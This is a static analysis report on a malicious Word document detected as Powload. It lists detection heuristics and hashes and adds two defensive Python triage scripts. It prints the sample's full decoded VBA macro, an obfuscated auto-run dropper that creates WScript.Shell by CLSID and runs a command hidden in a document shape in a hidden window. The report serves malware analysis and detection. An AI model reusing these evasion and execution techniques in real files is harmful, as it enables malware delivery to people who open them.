Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 afb95c94e6873c86…

MALICIOUS

Office (OLE)

Size: 138.1 KB | Created: 2018-11-28 14:11:00 | Authoring application: Microsoft Office Word | First seen: 2020-05-14
MD5: 80606700ff09c925bd4a56cc687aa91f
SHA-1: 2efea78b94f3555993986a7c2fc13fdc47e68703
SHA-256: afb95c94e6873c86590d0ab3bdf56bd83b1ada211fcc8b413fba54d244471ce3
Risk score: 212

Heuristics (8 findings)

  • ClamAV: Doc.Malware.Powload-6813874-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6813874-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. The CLSID in the matched line, 72C24DD5-D70A-438B-8A42-98424B88AFB8, is the default registration of WScript.Shell (Windows Script Host Shell Object); confirm on a reference host with: reg query HKCR\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}. The GUID is written without braces, and the four variables appended to it are never assigned anywhere in the recovered source, so they contribute nothing to the moniker and exist only to break exact-string matching. Later in the same procedure the object's Run method is invoked (CrwAvwW.Run# wKlRJ, unuABiiSPLv, with unuABiiSPLv declared Const 0, i.e. window style hidden), which is what makes this a command-execution primitive rather than a mere object lookup.
    Matched line in script
    Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + NXFHcPq + NiEXtr + SjwMs + cbKrzOSQ)
  • GetObject call high OLE_VBA_GETOBJ
    Generic GetObject usage. This fires on the same line as the CLSID finding above and is not an independent indicator.
    Matched line in script
    Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + NXFHcPq + NiEXtr + SjwMs + cbKrzOSQ)
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    Sub AutoOpen runs automatically when the document is opened and macros are enabled; it is the entry point for everything else in this macro.
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The generic description of this heuristic assumes that no modern VBA project was recovered, but that premise does not hold for this sample: olevba did recover a VBA project (macros.bas, below) and the marker is the same Sub AutoOpen. Treat it as corroboration of the AutoOpen finding rather than separate evidence; it is not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the DrawingML XML namespace identifier, expected in any Word file that carries shapes (the macro reads one: Shapes("CwhpKNbbRl")). It is not contacted at runtime and is not a network indicator for this sample.
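The findings above describe a chain (auto-exec entry point, COM object by CLSID, a string read from a document shape, a hidden-window Run) that an analyst should be able to re-check mechanically on the decoded source. The script below is an added example written for this page, not the analysis platform's own code. It parses decoded VBA for those four statements and links them together. The CLSID-to-ProgID table is an assumption from the author's knowledge of default Windows registrations, not something the report states; verify it on a reference host with reg query HKCR\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}. The sample input is constructed from the matched lines quoted above with the filler removed.

```python
import json
import re

# Added example, not the analysis platform's code. The CLSID -> ProgID table is
# an assumption from default Windows registrations (check on a reference host:
# reg query HKCR\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}).
KNOWN_CLSIDS = {
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell",
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
    "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject",
}

GUID = r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}"
# GetObject("new:<clsid>") with or without braces; trailing "+ var" junk is ignored
NEW_MONIKER_RE = re.compile(r'GetObject\s*\(\s*"new:\{?(' + GUID + r')\}?', re.I)
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(AutoOpen|AutoExec|AutoClose|Document_Open|Workbook_Open)\b", re.I | re.M)
SET_SHAPE_RE = re.compile(r'Set\s+(\w+)\s*=\s*Shapes\s*\(\s*"([^"]+)"\s*\)', re.I)
TEXT_READ_RE = re.compile(r"^\s*(\w+)\s*=.*?\b(\w+)\.TextFrame\.TextRange\.Text", re.I | re.M)
CONST_RE = re.compile(r"^\s*Const\s+(\w+)\s*=\s*(\d+)", re.I | re.M)
# ".Run" may carry a VBA type-declaration suffix (Run#, Run$, ...) on a late-bound call
RUN_RE = re.compile(r"\b(\w+)\.Run[#$%&!@]?\s+([^,\n]+?)\s*,\s*(\w+)", re.I)


def triage(vba: str) -> dict:
    """Extract the execution chain from decoded VBA source."""
    consts = {name: int(val) for name, val in CONST_RE.findall(vba)}
    # variable -> shape name, then destination variable -> shape whose text it copies
    shape_of = dict(SET_SHAPE_RE.findall(vba))
    text_from = {dst: shape_of.get(src, src) for dst, src in TEXT_READ_RE.findall(vba)}
    auto_exec = AUTOEXEC_RE.findall(vba)
    com_objects = [(g.upper(), KNOWN_CLSIDS.get(g.upper(), "unknown CLSID"))
                   for g in NEW_MONIKER_RE.findall(vba)]
    run_calls = []
    for obj, cmd, style in RUN_RE.findall(vba):
        cmd = cmd.strip()
        run_calls.append({
            "object": obj,
            "command_var": cmd,
            "command_source": text_from.get(cmd, "literal/other"),
            # WshShell.Run(cmd, intWindowStyle, ...): 0 hides the window
            "window_style": consts.get(style, int(style) if style.isdigit() else style),
        })
    tags = []
    if auto_exec:
        tags.append("auto-exec")
    if com_objects:
        tags.append("com-by-clsid")
    if any(r["command_source"] != "literal/other" for r in run_calls):
        tags.append("shape-text-dead-drop")
    if any(r["window_style"] == 0 for r in run_calls):
        tags.append("hidden-window-run")
    return {"auto_exec": auto_exec, "com_objects": com_objects,
            "run_calls": run_calls, "tags": tags}


# Constructed input: the behaviour-carrying lines quoted in the report, without
# the Select Case / For Each filler that surrounds them in the real macro.
SAMPLE_VBA = """Sub AutoOpen()
   On Error Resume Next
Set mnDPzzDM = Shapes("CwhpKNbbRl")
wKlRJ = "" + bzjFBo + mnDPzzDM.TextFrame.TextRange.Text + uBBpuTAn
Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + NXFHcPq + NiEXtr)
Const unuABiiSPLv = 0
CrwAvwW.Run# wKlRJ, unuABiiSPLv
End Sub
"""

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

Run against the full macros.bas the result is the same, since the filler blocks contain none of the matched constructs. The "command_source" field is the practical output: it tells you the string handed to Run lives in shape CwhpKNbbRl, so the next step is to dump that shape's text from the document rather than keep staring at the VBA.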

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7353 bytes
SHA-256: a608e9357e368a852156da2e494f22d8e6b8ec6ccf39fca08a34dcf06b33c962
Detection
ClamAV: No threats found (the Powload signature above fires on the OLE container, not on the decoded source; a clean result here is expected and does not lower the verdict)
Obfuscation or payload: likely
162 of 246 identifiers look randomly generated (e.g. 'CwhpKNbbRl') — consistent with name-mangling obfuscation.
Analyst note: apart from the names, most of the procedure is dead code. Each Select Case tests a variable that is never assigned, each For Each iterates a variable that is never assigned, and the arithmetic results are discarded; the On Error Resume Next before every block keeps the resulting errors silent. Only four statements carry the behaviour, in this order: Set mnDPzzDM = Shapes("CwhpKNbbRl") (a shape in the document body); wKlRJ = ... + mnDPzzDM.TextFrame.TextRange.Text + ... (the string later passed to Run is read from that shape's text frame, so it is absent from the VBA and from this artifact); Set CrwAvwW = GetObject("new:72C24DD5-...") (WScript.Shell by CLSID); and CrwAvwW.Run# wKlRJ, unuABiiSPLv (Run with window style 0, hidden; the # type-declaration suffix on Run is tolerated by VBA on a late-bound call and defeats a literal ".Run " string match). Recovering the actual payload requires dumping the text of shape CwhpKNbbRl from the document, which this report does not do.
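The identifier ratio above is a heuristic, and it helps to know what such a scorer actually measures before weighting it. The following is an added example written for this page, not the platform's own scorer: it tokenises the decoded VBA, drops keywords, strings and comments, splits each remaining name at its camel-case boundaries, and flags names with an unpronounceable part (no vowel, or a run of four or more consonants). Thresholds and the abbreviation allowlist are the author's assumptions; the sample input is a constructed slice of the recovered macro.

```python
import re

# Added example, not the analysis platform's scorer: a name-mangling heuristic
# over decoded VBA that yields the kind of ratio reported above. Thresholds and
# the abbreviation allowlist are the author's assumptions.
VBA_WORDS = {w.lower() for w in """
Sub End Function Set Let Dim As Const On Error Resume Next GoTo Select Case For
Each In To Step If Then Else ElseIf Do Loop While Wend With Exit Call New Nothing
True False And Or Not Xor Mod Is Me Private Public Option Explicit Integer Long
Double String Variant Object Boolean Byte Date CBool CLng CInt CDate CStr CDbl
Atn Sin Cos Chr Asc Len Mid Left Right Replace Split Join Array Hex Val Str Shell
CreateObject GetObject Shapes TextFrame TextRange Text Run Attribute ThisDocument
ActiveDocument Application
""".split()}
STRING_RE = re.compile(r'"[^"\n]*"')
COMMENT_RE = re.compile(r"'.*$", re.M)
ATTR_RE = re.compile(r"^\s*Attribute\b.*$", re.M)
IDENT_RE = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
VOWELS = set("aeiouyAEIOUY")
# Hungarian-style prefixes that have no vowel but are not generated names
COMMON_ABBR = {"str", "obj", "cmd", "ws", "fs", "lng", "int", "dbl", "txt", "url", "ptr",
               "buf", "tmp", "src", "dst", "len", "cnt", "idx", "msg", "wsh", "sql",
               "xml", "btn", "lbl", "frm", "cfg", "ctrl", "vb", "vba", "hwnd"}


def camel_segments(name: str) -> list:
    """Split at lower->upper boundaries: 'CwhpKNbbRl' -> ['Cwhp', 'KNbb', 'Rl']."""
    segs, cur = [], name[0]
    for prev, ch in zip(name, name[1:]):
        if prev.islower() and ch.isupper():
            segs.append(cur)
            cur = ch
        else:
            cur += ch
    segs.append(cur)
    return segs


def looks_random(name: str) -> bool:
    """Flag names whose camel-case parts are unpronounceable: a part with no
    vowel (and not a common abbreviation) or a run of 4+ consonants."""
    if sum(c.isalpha() for c in name) < 4:
        return False
    for seg in camel_segments(name):
        run = longest = 0
        for c in seg:
            run = 0 if (c in VOWELS or not c.isalpha()) else run + 1
            longest = max(longest, run)
        if longest >= 4:
            return True
        if len(seg) >= 2 and not (set(seg) & VOWELS) and seg.lower() not in COMMON_ABBR:
            return True
    return False


def identifier_report(vba: str) -> dict:
    """Unique user identifiers in the source and how many look generated."""
    body = COMMENT_RE.sub("", STRING_RE.sub('""', ATTR_RE.sub("", vba)))
    names = []
    for tok in IDENT_RE.findall(body):
        if tok.lower() not in VBA_WORDS and tok not in names:
            names.append(tok)
    flagged = [n for n in names if looks_random(n)]
    return {"total": len(names), "random": len(flagged), "flagged": flagged,
            "ratio": len(flagged) / len(names) if names else 0.0}


# Constructed input: a representative slice of the recovered macro above.
SAMPLE_VBA = """Attribute VB_Name = "GARczMqm"
Sub AutoOpen()
   On Error Resume Next
Select Case vkrIvo
      Case 261796299
         JMPfnbvWX = CBool(PIMdwq)
   End Select
Set mnDPzzDM = Shapes("CwhpKNbbRl")
wKlRJ = "" + mnDPzzDM.TextFrame.TextRange.Text
Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
Const unuABiiSPLv = 0
CrwAvwW.Run# wKlRJ, unuABiiSPLv
End Sub
"""

if __name__ == "__main__":
    rep = identifier_report(SAMPLE_VBA)
    print(f"{rep['random']} of {rep['total']} identifiers look randomly generated: {rep['flagged']}")
```

Two caveats show why this is evidence rather than a verdict. String literals are excluded here, so a shape name such as 'CwhpKNbbRl' only counts if the scorer also looks inside strings (the report's example suggests it does). And short Hungarian prefixes ("strPayload") will be flagged unless allowlisted, so a high ratio on a legitimately coded macro is possible; the ratio is meaningful in combination with the dead-code pattern and the execution chain, not on its own.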
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GARczMqm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case vkrIvo
      Case 261796299
         JMPfnbvWX = CBool(PIMdwq)
         XozAFqzj = 202977267
      Case 254520823
         BwZTiSn = Atn(aJpVSAf)
         oDwSlB = Atn(150279987 * CLng(161171088))
   End Select
         For Each opEWS In IoUUarvat
         WPbhSjzZf = ffUpA * CDate(BTtciGH * jjwjES) * dFcPluqhH / Sin(iqKQdUiU) / qbjQH + 108102333 - 51234510 + Chr(94127773) + (liTVM * CasZOi)
Next
   On Error Resume Next
Select Case wbSfAuHqB
      Case 228511584
         MWQBzzj = CBool(iplArb)
         EBzJRFzYj = 140090619
      Case 317061610
         CORXFoUc = Atn(HjQGqziK)
         bbEJpG = Atn(281881762 * CLng(290387237))
   End Select
         For Each QMzhjD In iwQRfL
         wIzRiDb = VOVuU * CDate(sZLjNXEQ * ZDNvMAOs) * PFFBsoIo / Sin(IrjLlidl) / EkSnRhX + 152978737 - 94832442 + Chr(135138031) + (PHGVn * PcqjWYY)
Next
Set mnDPzzDM = Shapes("CwhpKNbbRl")
   On Error Resume Next
Select Case BXfUnH
      Case 57851
         RzRMWR = CBool(ZJPFj)
         tTPSvJ = 198933616
      Case 105961790
         VBHWTPR = Atn(KzNSa)
         UJVBwsLR = Atn(85127322 * CLng(240300735))
   End Select
         For Each IDPCrwVCw In PFAzrHz
         HVBSk = IaHhXJEpW * CDate(LMCHSzr * iGFEUD) * kLNFO / Sin(pSUtRqoin) / aiVmfFr + 246706414 - 53337129 + Chr(201585195) + (odpEFEcn * rjIpVtiOB)
Next
   On Error Resume Next
Select Case kCjBkNGiv
      Case 179842107
         KQzTP = CBool(WINstzHPE)
         UXMzjLK = 106854421
      Case 50139025
         voBBioWD = Atn(HcQiaTF)
         BrFcm = Atn(208979615 * CLng(235211728))
   End Select
         For Each LjbWwGhM In whGLJFaD
         zBDolfaH = ZCEJJ * CDate(QXFuhd * vEAcm) * srlfYwiih / Sin(wvvqzIK) / oYovmzf + 150600169 - 62911840 + Chr(313256652) + (zoItb * QnWjKa)
Next
wKlRJ = "" + bzjFBo + rifVzRZ + LmLrpjqa + mWdkzb + mnDPzzDM.TextFrame.TextRange.Text + YjUEDZp + vJiGmDId + uBBpuTAn
   On Error Resume Next
Select Case Mzupinujk
      Case 58059155
         XJHHcGwhs = CBool(YWNnXzi)
         vvSVp = 327101863
      Case 331789580
         PXXUt = Atn(EqNtLoc)
         KjBXnajCG = Atn(262793553 * CLng(106085712))
   End Select
         For Each pMcBUJI In qZJYbBS
         Ziophvl = URJXWMQj * CDate(UhrNL * BfCIkZc) * mIIcczart / Sin(sjCAlDd) / aUHUa + 64122061 - 90789514 + Chr(29569258) + (KimAKrVX * Njnjdc)
Next
   On Error Resume Next
Select Case FoowV
      Case 157925559
         JAARS = CBool(tiZtQn)
         jWkiKG = 12526672
      Case 298256573
         IjwQi = Atn(LwbTr)
         GKiCRJp = Atn(196775958 * CLng(107896437))
   End Select
         For Each UEFXiEFlO In HErQVBi
         WbRwvnaM = jtwMP * CDate(RPrLLbHs * EVWCSShPf) * HoZXJ / Sin(wVBYsS) / rPaAd + 282037331 - 128943292 + Chr(50025956) + (ibsZRY * kzdRGIzrr)
Next
   On Error Resume Next
Select Case OUPWOQjo
      Case 251591343
         pYXKlFHSK = CBool(XKjqbzhz)
         WFAWp = 175999019
      Case 164045125
         UcOzV = Atn(ssMtU)
         UDRWUJE = Atn(266638292 * CLng(161282208))
   End Select
         For Each OihmPkoCh In MznpvlBH
         zOFNdhSo = CjWkiZN * CDate(SjnIEKMk * WQbaj) * zAajJ / Sin(EEwwJz) / NcPNc + 105572309 - 123600096 + Chr(121896687) + (ftDtdT * BMDSYY)
Next
   On Error Resume Next
Select Case NsCjvOaRo
      Case 131495540
         lwcodjh = CBool(zkbFMAAB)
         jikwnwVN = 201509120
      Case 288855890
         djCjkaCjr = Atn(PwZwF)
         lmqivN = Atn(284979970 * CLng(226420251))
   End Select
         For Each jfzAG In zroLShr
         lwUKZUk = Bihkao * CDate(zQpTd * uFfki) * Gklmju / Sin(EkaCRO) / YiOSWAK + 229956099 - 282008199 + Chr(306754750) + (ONTrsoa * EdaPwBpIk)
Next
Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + NXFHcPq + NiEXtr + SjwMs + cbKrzOSQ)
   On Error Resume Next
Select Case ZjNFGj
      Case 199673747
         nTcWhzhs = CBool(wACwH)
         LqTHrSzqw = 211736412
      Case 199242520
         jRnXkwr = Atn(KahrqmK)
         tAZTRmBP = Atn(258092708 * CLng(167719228))
   End Select
         For Each QnciqDaA In RYPEGkn
         IbQEIOzz = LGuPY * CDate(LLbjhvro * ljTUkV) * hwQGLI / Sin(IZfhksTG) / toEsfB + 41348705 - 278237774 + Chr(114939235) + (ATYudMlz * vzRYCdT)
Next
   On Error Resume Next
Select Case jDiivJN
      Case 274639677
         adfjPV = CBool(HOiZjDlqa)
         ckiOKsO = 59811731
      Case 75689277
         iqPuwkv = Atn(MfjEoq)
         czHoc = Atn(115872518 * CLng(265363439))
   End Select
         For Each ZhcKw In lQXEvM
         wodwIb = vmYvoGh * CDate(GUjItipMT * wuaOLzt) * rdIdqTq / Sin(NnJjWq) / qKCVmSiJ + 183630581 - 67412671 + Chr(158776525) + (jDhaYB * OEmci)
Next
   On Error Resume Next
Select Case UTcQu
      Case 304331094
         FkGJMHIbp = CBool(SIqfifXl)
         ndwMIwz = 35843260
      Case 275986799
         DwqkQWtw = Atn(LzLGXSF)
         iXloFf = Atn(137759731 * CLng(41542029))
   End Select
         For Each IYzNPB In omscXa
         ohzab = WYtCjTi * CDate(zzQVi * NVAKwwtSl) * drDOzHG / Sin(tdwkf) / jvTOoobGt + 195567295 - 312464765 + Chr(124370171) + (oifjDmSZ * PUGsqLbA)
Next
Const unuABiiSPLv = 0
   On Error Resume Next
Select Case iwwvs
      Case 61943571
         AhQrnWBGJ = CBool(MQBsUcbzj)
         ifAzns = 341665620
      Case 305614808
         Zwjdcho = Atn(PoLLXWiX)
         VRNWVwIsP = Atn(136174465 * CLng(215418706))
   End Select
         For Each EuWHjk In cmYKj
         MKXFLJVa = XihAEAblN * CDate(IVKuoD * lcuJwGhj) * lkmDL / Sin(tOXnaj) / BBBLzYRB + 106779329 - 230529577 + Chr(13792471) + (XtfjacA * vOqwKB)
Next
   On Error Resume Next
Select Case jfztIC
      Case 15183586
         LzQiNU = CBool(ozfhEajK)
         opaBI = 256627126
      Case 4023709
         IAcLEi = Atn(oBToW)
         CvwDObwS = Atn(270175744 * CLng(263992881))
   End Select
         For Each UuFSc In LYzzW
         rdkOct = HunYm * CDate(czuLDzSLc * JdjLAIPZj) * hGadMTYl / Sin(FjWTXADQ) / tBDBPm + 174940171 - 244567159 + Chr(299299950) + (DwiOrGMV * QwjZhiW)
Next
   On Error Resume Next
Select Case apCmWo
      Case 230211797
         kNhdC = CBool(TLMXAbJ)
         sjUvt = 138325207
      Case 273016335
         hwapSsW = Atn(tdDTFGJU)
         QVCSqfmF = Atn(132730775 * CLng(325256493))
   End Select
         For Each RbvNPN In lDMKapfd
         YqBlZAJ = znErRok * CDate(vCPShpDra * QZGuMnN) * NOSLt / Sin(STOcJo) / ObLfnP + 71243568 - 272035924 + Chr(234777638) + (JLBjkVEb * dIbWfj)
Next
CrwAvwW.Run# wKlRJ, unuABiiSPLv
   On Error Resume Next
Select Case pBtaqzu
      Case 147667916
         QQSQPapb = CBool(OrOSuFsrU)
         hbtAuX = 143020603
      Case 336542615
         jVpLKMOBs = Atn(tllzHS)
         MWHoiwdip = Atn(53072906 * CLng(153658473))
   End Select
         For Each Xstbrs In YjEFjEA
         aivilhzL = rKAXMjVEq * CDate(USzKuFlu * IQbjiR) * Atdli / Sin(hujhrwL) / jBpSf + 90883923 - 174261400 + Chr(128542845) + (ZAnkD * QaSFJfba)
Next
End Sub